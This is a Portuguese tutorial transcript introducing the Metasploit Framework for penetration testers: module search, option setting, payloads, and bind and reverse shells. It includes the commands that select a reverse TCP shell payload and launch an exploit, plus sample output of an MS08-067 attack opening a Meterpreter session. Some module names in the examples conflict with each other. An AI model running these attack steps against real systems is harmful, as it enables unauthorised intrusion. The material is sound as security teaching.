Introdução ao Metasploit Framework

Transcrição

1 Introdução ao Metasploit Framework Veremos o Metasploit Framework, uma ferramenta que tornou-se padrão para pentesters. Lançado pela primeira vez em 2003, Metasploit alcançou status na comunidade de segurança. Embora Metasploit agora seja de propriedade da empresa de segurança Rapid7, uma edição de código aberto está ainda disponível, com o desenvolvimento em grande parte impulsionado pela comunidade de segurança. A arquitetura modular e flexível do Metasploit ajuda os desenvolvedores de forma eficiente a criar exploits que trabalham de acordo com as novas vulnerabilidades quando são descobertas. Como você verá, Metasploit é intuitiva e fácil de usar, e oferece uma forma centralizada para executar código confiável de exploração que foi analisado com precisão pela comunidade de segurança. Por que usar o Metasploit? Digamos que você descobriu uma vulnerabilidade no ambiente de seu cliente usando o sistema Windows XP no e está faltando Microsoft boletim de segurança MS Como um pentester, é sua função explorar esta vulnerabilidade, se possível, e avaliar o risco de compromete-lo. Uma abordagem pode ser a de criar, em seu laboratório um sistema Windows XP, que também está faltando este patch, tentar disparar a vulnerabilidade, e desenvolver um trabalho exploração. Mas o desenvolvimento de exploits na mão leva tempo e habilidade, e a janela de oportunidade para o seu pentest pode estar fechando. Você poderia, em vez disto, procurar o código que explora a

2 vulnerabilidade na Internet. Sites como o Packet Storm Security, SecurityFocus e Exploit-DB fornecem repositórios de exploits conhecidos. Mas esteja avisado: Nem todos os códigos de exploits públicos fazem o que ele deveriam fazer. Alguns exploits podem destruir o sistema alvo ou até mesmo atacar seu próprio sistema, em vez do alvo. Você deve estar sempre vigilante ao executar qualquer coisa que você encontrar online e ler o código com cuidado antes de confiar nele. Além disso, os exploits públicos que você encontrar pode não atender às suas necessidades logo de cara. Você pode precisar fazer algum trabalho adicional para portá-las para o seu ambiente de pentest. Seja desenvolver um exploit do zero ou usar um público como base, ainda vai precisar de ter o exploit para trabalhar em seu pentest. Nosso tempo provavelmente será melhor gasto em tarefas que são difíceis de automatizar e, felizmente, podemos usar Metasploit para fazer exploração de vulnerabilidades conhecidas, tais como a MS de forma rápida e sem atrasos. Iniciando o Metasploit No Kali Linux, o Metasploit pode iniciar em qualquer lugar no sistema. Mas antes de começar Metasploit, você vai querer começar o banco de dados PostgreSQL, que Metasploit vai usar para acompanhar o que você faz. root@kali:~# service postgresql start Agora você está pronto para iniciar o serviço Metasploit. Este comando cria um usuário do PostgreSQL chamado msf3 e um banco de dados correspondente para armazenar nossos dados. Ele também começa a chamada de procedimento remoto do Metasploit (RPC) do servidor e servidor web. Existem várias interfaces para usar Metasploit. Vamos usar

3 msfconsole, o console baseado em texto Metasploit e Msfcli, a interface de linha de comando. De qualquer interface pode ser usada para executar módulos Metasploit. Inicie o console inserindo msfconsole. root@kali:~# msfconsole Não se assuste se msfconsole parecer travar por um ou dois minutos; O Metasploit está carregando os módulos na hora. Assim que terminar, será exibida uma arte ASCII, uma lista de versão e outros detalhes, e um prompt msf>. Msfconsole Veja que ao iniciar o Metasploit, ele informa a quantidade de exploits, módulos auxiliares e outras coisas. Ao longo do tempo isto vai crescendo de acordo com que novas vulnerabilidades são descobertas e a comunidade desenvolve. Caso você tenha dúvidas sobre o que fazer dentro da

4 ferramenta, você pode consultar o help. Caso queira mais detalhes sobre um comando específico, use o help <comando>. msf > help route Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local... Procurando por módulos Após realizar uma análise de vulnerabilidade e identificar mais detalhes sobre as falhas do sistema, podemos partir para a busca no Metasploit para encontrar um módulo que explore esta vulnerabilidade em particular. Temos algumas opções. Normalmente, uma simples busca no Google vai encontrar o que você precisa, mas Metasploit também tem um banco de dados online de módulos e uma função embutida de pesquisa que você pode usar para pesquisar pelo módulo correto. O banco de dados on-line de módulos Você pode usar a página de pesquisa Metasploit para combinar módulos Metasploit com as vulnerabilidades pelo número Common Vulnerabilities and Exposures (CVE), Open Sourced Vulnerability Database (OSVDB) ID, Bugtraq ID ou Microsoft Security Bulletin, ou você pode pesquisar o texto completo sobre as informações do módulo para uma string.

5 Rapid7 Metasploit Module Database Busca embutida Você também pode usar a busca embutida no Metasploit para achar o módulo pelo nome usando o comando search <string>: Metasploit Busca por módulo Após encontrar um módulo que desejamos, podemos obter mais detalhes sobre ele usando o comando info <nome do módulo>, veja:

6 Metasploit Comando info Após achar o módulo que deseja usar, você usa o comando use <nome do módulo> Metasploit Comando use Configurando as opções do módulo Após escolher qual módulo iremos usar, temos que definir alguns parâmetros no Metasploit. Para saber quais parâmetros são obrigatórios e opcionais para definirmos, antes de executá-lo, devemos usar o comando show options.

7 Metasploit Comando show options Alguns parâmetros já vem com valores padrões. Perceba também que existe uma coluna Required que informa quais campos são obrigatórios e precisam de um valor. No caso do nosso exploit escolhido, precisamos definir os campos SRVHOST e SRVPORT, já o SSL, SSLCert e URIPATH são opcionais. Veremos cada um deles abaixo e outros possíveis campos que podem aparecer, dependendo de cada módulo que você escolher. SRVHOST É a máquina que estará esperando pelos dados (ouvindo). Deve inserir um endereço de uma máquina local ou Neste caso, seria a sua máquina atacante. SRVPORT A porta local que está aberta ouvindo as informações. SSL Informe se será necessário negociar uma conexão SSL SSLCert O caminho para o certificado personalizado que foi gerado. Por padrão ele gera um aleatoriamente.

8 URIPATH A URI usada para este exploit. Por padrão ele gera um aleatoriamente. RHOST Outros exploits podem utilizar este parâmetro, o que significa qual é o host alvo que desejamos fazer o exploit. Este parâmetro é obrigatório (se o exploit escolhido tiver), pois é nele quem você deve apontar para que o Metasploit possa atacar. RPORT Refer-se a porta da máquina alvo. Dependendo do exploit escolhido, ele deverá vir com uma porta padrão. Se for um exploit que utiliza a Web, vai pela porta 80. Caso seja um exploit para o serviços SMB do Windows, será pela porta 445, e assim por diante. Exploit Target Na imagem exibida, temos que o parâmetro está definido como 0 Automatic Targeting. Neste caso, ele serve para definir qual é o tipo e versão do sistema operacional. Você pode usar o comando show targets para listar quais as opções disponíveis no exploit. Após listar e você identificar qual é o S.O. e a versão, podemos usar o comando set target <número>. Caso você não saiba com certeza qual é a versão do sistema operacional, você pode deixar que o Metasploit faça o trabalho de reconhecimento e escolha a melhor opção de forma automática baseada no resultado.

9 Payloads (ou Shellcode) Baseado no que lemos após o comando show options, definimos todos os parâmetros para usar o exploit, mas ainda precisamos informar ao Metasploit o que ele deve fazer de fato, e para isto devemos usar os payloads. Estão disponíveis diversos payloads na ferramenta, que vão desde simples comandos do Windows até o Metasploit Meterpreter. Escolha um payload compatível e o Metasploit criará uma string do exploit, incluindo o código para disparar a vulnerabilidade e o payload para rodar depois que o exploit for bem sucedido. Procurando por payloads compatíveis Use o comando show payloads para que ele possa exibir uma lista dos que são compatíveis. Caso você esqueça de definir um payload, o Metasploit irá utilizar o que estiver marcado como padrão, o que não garante que vai funcionar com o seu sistema alvo. É importante que você defina manualmente qual payload vai usar. Metasploit show payloads Para definir qual payload você usará, envie o comando set payload <nome do payload com endereço>. Por exemplo:

10 msf exploit(ms16_051_vbscript) > set payload windows/x64/shell/reverse_tcp payload => windows/x64/shell/reverse_tcp Executando o exploit Para enviarmos o nosso exploit com o payload, precisamos usar o comando exploit. Após isso você verá um resultado semelhante a este, caso seja bem sucedido. msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on :4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:english [*] Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage ( bytes) to [*] Meterpreter session 1 opened ( :4444 -> :1334) at :37: meterpreter > Neste exemplo, foi possível obter um sessão com o meterpreter (meta-interpreter), que é uma parte importante do Metasploit. Com ele, você pode fazer tudo na sua máquina alvo através de comando. Para sair do meterpreter, use o comando exit. Tipos de shells Na lista de payloads compatíveis mostrado no show payloads, você vê uma gama de opções, incluindo shells de comando, Meterpreter, uma speech API ou a execução de um único comando do Windows. Meterpreter ou outras formas de shells, acabam sendo de duas categorias: bind e reverso (reverse).

11 Bind shells Uma instrução de bind shell diz para a máquina alvo para abrir uma linha de comando e escutar na porta local. A máquina atacante então se conecta na máquina alvo na porta que está aberta. Entretanto, com o advento dos firewalls, a efetividade dos bind shells tem caído porque firewall de correlação bloqueará o tráfego para portas aleatórias como a Reverse shells Um shell reverso, por outro lado, ativamente envia uma conexão de volta para a máquina atacante, a qual está esperando por uma conexão de entrada. Neste caso, nossa máquina atacante está com uma porta aberta e escutando por uma conexão vinda da nossa máquina alvo, porque é uma conexão reversa, e é mais provável de ser feita através de um firewall. Quer aprender mais Metasploit? Learn Ethical Expert Metasploit Metasploit Framework Hacking With Kali, Penetration Testing for Beginners Nmap and Metasploit! Series Fonte: Weidman, Georgia. Penetration Testing: A Hands-On Introduction to Hacking. 2014